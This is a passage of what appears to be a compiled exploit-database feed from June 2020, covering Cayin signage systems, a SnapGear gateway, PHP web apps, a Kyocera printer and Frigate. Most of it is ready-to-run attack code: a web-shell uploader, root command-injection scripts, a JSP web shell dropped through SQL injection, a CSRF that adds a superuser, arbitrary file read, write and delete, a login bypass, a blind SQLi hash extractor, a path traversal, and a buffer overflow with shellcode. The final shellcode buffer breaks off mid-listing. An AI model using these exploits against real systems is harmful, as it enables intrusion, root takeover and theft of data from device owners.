name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \
          $"$url/user/marriage-reg-form.php" >>/dev/null
      }

      upload

      #Execute the given command
      shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '')
      check=$(echo $command | grep " " | wc -l)
      if [[ $check > 0 ]]
      then
          fixed_command=$(echo $command | sed 's/ /%20/g')
          curl -s "$url/user/images/$shell_file?cmd=$fixed_command"
      else
          curl -s "$url/user/images/$shell_file?cmd=$command"
      fi

      echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS"
      echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded"
      shift $((OPTIND-1))
      ```
12. # Title: Cayin Content Management Server 11.0 - Remote Command Injection (root)
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A

Cayin Content Management Server 11.0 Root Remote Command Injection

Vendor: CAYIN Technology Co., Ltd.
Product web page: https://www.cayintech.com
Affected version: CMS-SE v11.0 Build 19179
                  CMS-SE v11.0 Build 19025
                  CMS-SE v11.0 Build 18325
                  CMS Station (CMS-SE-LXC)
                  CMS-60 v11.0 Build 19025
                  CMS-40 v9.0 Build 14197
                  CMS-40 v9.0 Build 14099
                  CMS-40 v9.0 Build 14093
                  CMS-20 v9.0 Build 14197
                  CMS-20 v9.0 Build 14092
                  CMS v8.2 Build 12199
                  CMS v8.0 Build 11175
                  CMS v7.5 Build 11175

Summary: CAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you don't have to do the hard work.

Desc: CAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page.

Tested on: Apache/1.3.42 (Unix)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5570
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php

15.05.2020

---

Session created with default credentials (webadmin:bctvadmin).

HTTP POST Request:
-----------------

POST /cgi-bin/system.cgi HTTP/1.1
Host: 192.168.1.3
Content-Length: 201
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Smith
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/cgi-bin/system.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
Connection: close

save_system: 1
system_date: 2020/5/16 06:36:48
TIMEZONE: 49
NTP_Service: 1
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
TEST_NTP: 測試
reboot1: 1
reboot_sel1: 4
reboot_sel2: 1
reboot_sel3: 1
font_list: ZH_TW

Request recorder @ ZSL:
-----------------------

Origin of HTTP request: 192.168.1.3:61347

HTTP GET request to vrfy.zeroscience.mk:

GET / HTTP/1.0
User-Agent: MyVoiceIsMyPassportVerifyMe
Host: vrfy.zeroscience.mk
Accept: */*
Connection: Keep-Alive

PoC script:
-----------

import requests

url = "http://192.168.1.3:80/cgi-bin/system.cgi"

cookies = {"cy_lang": "ZH_TW",
           "cy_us": "67176fd7d3d05812008",
           "cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
           "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
           "WEB_STR_SYSTEM": "SYSTEM_SETTING",
           "cy_cgi_tp": "1591206269_15957"}

headers = {"Cache-Control": "max-age=0",
           "Origin": "http://192.168.1.3",
           "Content-Type": "application/x-www-form-urlencoded",
           "User-Agent": "Smith",
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
           "Referer": "http://192.168.1.3/cgi-bin/system.cgi",
           "Accept-Encoding": "gzip, deflate",
           "Accept-Language": "en-US,en;q=0.9",
           "Connection": "close"}

data = {"save_system": "1",
        "system_date": "2020/5/16 06:36:48",
        "TIMEZONE": "49",
        "NTP_Service": "1",
        "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
        "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
        "reboot1": "1",
        "reboot_sel1": "4",
        "reboot_sel2": "1",
        "reboot_sel3": "1",
        "font_list": "ZH_TW"}

requests.post(url, headers=headers, cookies=cookies, data=data)
13. # Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: http://www.securecomputing.com
# CVE: N/A

Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User

Vendor: Secure Computing Corp.
Product web page: http://www.securecomputing.com
Affected version: 3.1.5u1

Summary: The SG gateway appliance range provides Internet security and privacy of communications for small and medium enterprises, and branch offices. It simply and securely connects your office to the Internet, and with its robust stateful firewall, shields your computers from external threats.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: fnord/1.9
           Apache 1.3.27 (Unix)
           Linux 2.4.31

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5567
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php

14.05.2020

--

CSRF Add Super User:
--------------------

<html>
  <body>
    <form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST">
      <input type="hidden" name=".form" value="edit" />
      <input type="hidden" name=".page" value="adminusers_edit" />
      <input type="hidden" name="login" value="testingus" />
      <input type="hidden" name="fullname" value="ZSL" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="confirm" value="123456" />
      <input type="hidden" name="acl.login" value="on" />
      <input type="hidden" name="acl.admin" value="on" />
      <input type="hidden" name="acl.diags" value="on" />
      <input type="hidden" name="acl.saverestore" value="on" />
      <input type="hidden" name="acl.setpassword" value="on" />
      <input type="hidden" name="finish" value="Finish" />
      <input type="hidden" name=".defaultname" value="finish" />
      <input type="submit" value="Idemo" />
    </form>
  </body>
</html>

Result /etc/shadow:

root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh
sshd:!!:100:65534::/home:/bin/false
clamav:!!:103:65534::/home:/bin/false
testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh
14. # Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A

#!/usr/bin/env python3
#
#
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: 2.5.18103
#                   2.0
#                   1.0
#
# Summary: CAYIN xPost is the web-based application software, which offers a
# combination of essential tools to create rich contents for digital signage in
# different vertical markets. It provides an easy-to-use platform for instant
# data entry and further extends the usage of CAYIN SMP players to meet users'
# requirements of frequent, daily maintenance.
#
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
# is not properly sanitised before being returned to the user or used in SQL queries.
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
# and execute SYSTEM commands.
#
# --------------------------------------------------------------------------------
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
#
# Injecting...
#
# Executing...
#
# Command: whoami
#
# nt authority\system
#
#
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
# lqwrm@zslab:~$
# --------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 10 Home
#            Microsoft Windows 8.1
#            Microsoft Windows Server 2016
#            Microsoft Windows Server 2012
#            Microsoft Windows 7 Ultimate SP1
#            Apache Tomcat/9.0.1
#            MySQL/5.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5571
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
#
#
# 15.05.2020
#

import requests as req
import time as vremeto
import sys as sistemot
import re as regularno

if len(sistemot.argv) < 2:
    print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
    print("Usage: ./wayfinder.py ip:port")
    sistemot.exit(19)
else:
    ip = sistemot.argv[1]

filename = "thricer.jsp"
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
constr = "-251' UNION ALL SELECT "

print("# Injecting...")

cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
cmdjsp += "0a0a"

columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"

mysqli = constr + cmdjsp + columns + sqlwrite

r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
vremeto.sleep(1)

print("# Executing...")

r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
clean = clean.group(1).replace("<BR>", "\n")
print(clean)
print("You have a webshell @ http://" + ip + "/" + filename)
15. # Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: http://www.securecomputing.com
# CVE: N/A

Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write

Vendor: Secure Computing Corp.
Product web page: http://www.securecomputing.com
Affected version: 3.1.5u1

Summary: The SG gateway appliance range provides Internet security and privacy of communications for small and medium enterprises, and branch offices. It simply and securely connects your office to the Internet, and with its robust stateful firewall, shields your computers from external threats.

Desc: The application allows the currently logged-in user to edit the configuration files in the system using the CGI executable 'edit_config_files' in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete) are located in the /etc/config/ directory. An attacker can manipulate the POST request parameters to escape from the restricted environment by using absolute path and start reading, writing and deleting arbitrary files on the system.

Tested on: fnord/1.9
           Apache 1.3.27 (Unix)
           Linux 2.4.31

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5568
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php

14.05.2020

--

Read:
-----

<html>
  <body>
    <form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
      <input type="hidden" name=".form" value="choices" />
      <input type="hidden" name=".page" value="select_file" />
      <input type="hidden" name="name$1337" value="/var/log/messages" />
      <input type="hidden" name="modify$1337" value="1" />
      <input type="hidden" name=".defaultname" value="newitem" />
      <input type="submit" value="Read" />
    </form>
  </body>
</html>

Write/overwrite/move:
---------------------

<html>
  <body>
    <form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
      <input type="hidden" name=".form" value="edit" />
      <input type="hidden" name=".page" value="edit_file" />
      <input type="hidden" name="enabled$0" value="" />
      <input type="hidden" name="name$0" value="/etc/motd" />
      <input type="hidden" name="mode$0" value="" />
      <input type="hidden" name="filename" value="/etc/motd" />
      <input type="hidden" name="filecontents" value="pwned" />
      <input type="hidden" name="finish" value="Finish" />
      <input type="hidden" name=".defaultname" value="finish" />
      <input type="submit" value="Write" />
    </form>
  </body>
</html>

Delete:
-------

<html>
  <body>
    <form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
      <input type="hidden" name=".form" value="choices" />
      <input type="hidden" name=".page" value="select_file" />
      <input type="hidden" name="name$251" value="/root/.secret" />
      <input type="hidden" name="delete$251" value="1" />
      <input type="hidden" name=".defaultname" value="newitem" />
      <input type="submit" value="Delete" />
    </form>
  </body>
</html>
16. # Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
# Author: LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A

#!/usr/bin/env python3
#
#
# Cayin Signage Media Player 3.0 Root Remote Command Injection
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: SMP-8000QD v3.0
#                   SMP-8000 v3.0
#                   SMP-6000 v3.0 Build 19025
#                   SMP-6000 v1.0 Build 14246
#                   SMP-6000 v1.0 Build 14199
#                   SMP-6000 v1.0 Build 14167
#                   SMP-6000 v1.0 Build 14097
#                   SMP-6000 v1.0 Build 14090
#                   SMP-6000 v1.0 Build 14069
#                   SMP-6000 v1.0 Build 14062
#                   SMP-4000 v1.0 Build 14098
#                   SMP-4000 v1.0 Build 14092
#                   SMP-4000 v1.0 Build 14087
#                   SMP-2310 v3.0
#                   SMP-2300 v3.0 Build 19316
#                   SMP-2210 v3.0 Build 19025
#                   SMP-2200 v3.0 Build 19029
#                   SMP-2200 v3.0 Build 19025
#                   SMP-2100 v10.0 Build 16228
#                   SMP-2100 v3.0
#                   SMP-2000 v1.0 Build 14167
#                   SMP-2000 v1.0 Build 14087
#                   SMP-1000 v1.0 Build 14099
#                   SMP-PROPLUS v1.5 Build 10081
#                   SMP-WEBPLUS v6.5 Build 11126
#                   SMP-WEB4 v2.0 Build 13073
#                   SMP-WEB4 v2.0 Build 11175
#                   SMP-WEB4 v1.5 Build 11476
#                   SMP-WEB4 v1.5 Build 11126
#                   SMP-WEB4 v1.0 Build 10301
#                   SMP-300 v1.0 Build 14177
#                   SMP-200 v1.0 Build 13080
#                   SMP-200 v1.0 Build 12331
#                   SMP-PRO4 v1.0
#                   SMP-NEO2 v1.0
#                   SMP-NEO v1.0
#
# Summary: CAYIN Technology provides Digital Signage
# solutions, including media players, servers, and
# software designed for the DOOH (Digital Out-of-home)
# networks. We develop industrial-grade digital signage
# appliances and tailored services so you don't have
# to do the hard work.
#
# Desc: CAYIN SMP-xxxx suffers from an authenticated
# OS command injection vulnerability using default
# credentials. This can be exploited to inject and
# execute arbitrary shell commands as the root user
# through the 'NTP_Server_IP' HTTP GET parameter in
# system.cgi and wizard_system.cgi pages.
#
# -----------------------------------------------------
# $ ./cayin.py 192.168.1.2 id
# uid=0(root) gid=65534(guest)
#
# start sshd
# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd
# $
# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'"
# tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
# tcp        0      0 :::22                   :::*                    LISTEN
# $ ./cayin.py 192.168.1.2 "cat /etc/passwd"
# root:x:0:0:root:/root:/bin/bash
# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
# sshd:x:1000:0::/dev/null:/sbin/nologin
# $
# -----------------------------------------------------
#
# Tested on: CAYIN Technology KT-Linux v0.99
#            Apache/1.3.42 (Unix)
#            Apache/1.3.41 (Unix)
#            PHP/5.2.5
#            Linux 2.6.37
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5569
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
#
#
# 15.05.2020
#

import requests
import sys#____
import re#_____

if len(sys.argv) < 3:
    print("Cayin SMP WebManager Post-Auth RCE")
    print("Usage: ./cayin.py [ip] [cmd]")
    sys.exit(17)
else:
    ip____address = sys.argv[1]
    ex____command = sys.argv[2]

ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f"
ur____identif += (bytes(ip____address, "utf-8"))
ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
ur____identif += b"\x67\x25\x32\x36" ##########"
ur____identif += (bytes(ex____command, "utf-8"))
ur____identif += b"\x25\x32\x36" ##############"

ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
print(re____outputs)
17. # Exploit Title: Online Course Registration 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-06-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php
# Parameter & Payload: '=''or'

# Proof of Concept:

http://localhost/Online%20Course%20Registration/admin/index.php

POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Referer: http://localhost/Online%20Course%20Registration/admin/index.php
Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
Connection: keep-alive
Upgrade-Insecure-Requests: 1

username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined

HTTP/1.1 302 Found
Date: Thu, 04 Jun 2020 20:04:27 GMT
Server: Apache/2.4.39 (Win64) PHP/7.3.5
X-Powered-By: PHP/7.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: http://localhost/Online Course Registration/admin/change-password.php
18. # Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://github.com/sunnygkp10/
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
# Affected Version: 2015
# Tested on: Ubuntu
# CVE : N/A

import requests, string, time
from sys import stdout

URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")

payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','[email protected]','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"

so_far = hash = ""

while True:
    for i in string.digits + string.ascii_lowercase:
        so_far = hash + i
        payload_to_send = payload + str(so_far) + payload2
        data = {"name":"test","email":"[email protected]","subject":"test","feedback":payload_to_send}
        start = time.time()
        r = requests.post(URL + "feed.php", data = data)
        request_time = time.time() - start
        if request_time > 5:
            hash += i
            stdout.write(i)
            stdout.flush()
            break
    if len(hash) > 31:
        stdout.write("\n")
        print "Hash found: " + hash
        break
19. # Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)
# Exploit Author: Hakan Eren ŞAN
# Date: 2020-06-06
# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html
# Version: d-COPIA253MF plus
# Tested on : Linux
# Credit: Berat Isler

# First step, you can capture the main page
# Then create a directory traversal payload like this: ../../../
# Then you add a nullbyte to the end of the payload (%00)
# Last step, send your request

This is the code:

Request:

GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rtl=0
Upgrade-Insecure-Requests: 1
If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT"
Cache-Control: max-age=0

Response:

HTTP/1.1 200 OK
Content-Length: 843
Date: Thu, 04 Jun 2020 16:09:54 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT
ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun 2020 13:41:16 GMT"
Content-Type: text/html

root::0:0:root:/root:/bin/sh
bin:*:1:1:bin:/bin:/bin/sh
daemon:*:2:2:daemon:/usr/sbin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
adm:*:4:4:adm:/var/adm:/bin/sh
lp:*:5:7:lp:/var/spool/lpd:/bin/sh
sync:*:6:8:sync:/bin:/bin/sync
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
halt:*:8:10:halt:/sbin:/sbin/halt
mail:*:9:11:mail:/var/mail:/bin/sh
news:*:10:12:news:/var/spool/news:/bin/sh
uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh
operator:*:12:0:operator:/root:/bin/sh
games:*:13:60:games:/usr/games:/bin/sh
ftp:*:15:14:ftp:/var/ftp:/bin/sh
man:*:16:20:man:/var/cache/man:/bin/sh
www:*:17:18:www-data:/var/www:/bin/sh
sshd:*:18:19:sshd:/var/run/sshd:/bin/sh
proxy:*:19:21:proxy:/bin:/bin/sh
telnetd:*:20:22:proxy:/bin:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
ais:*:101:101:ais:/var/run/ais:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
20. # Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)
# Vendor Homepage: http://www.frigate3.com/
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-07
# Vulnerable Software: Frigate
# Version: <= 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

#Steps to Produce the Crash:
# 1.- Run python code: FrigateLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for Frigate3.exe
# 4.- Open "Frigate3.exe"
# 5.- Go to "Command" > "Command Line" > "Activate Command Line"
# 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
# 7.- Press Enter from Keyboard.
# 8.- Click on OK in the dialog box that appears.
# 9.- Calc.exe runs.

#################################################################################################################################################

#Python "FrigateLCE.py" Code:

f= open("FrigateLCE.txt", "w")

junk="A" * 4112

nseh="\xeb\x20\x90\x90"
seh="\x4B\x0C\x01\x40"
#40010C4B   5B   POP EBX
#40010C4C   5D   POP EBP
#40010C4D   C3   RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl)

nops="\x90" * 50

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
buf = ""
buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
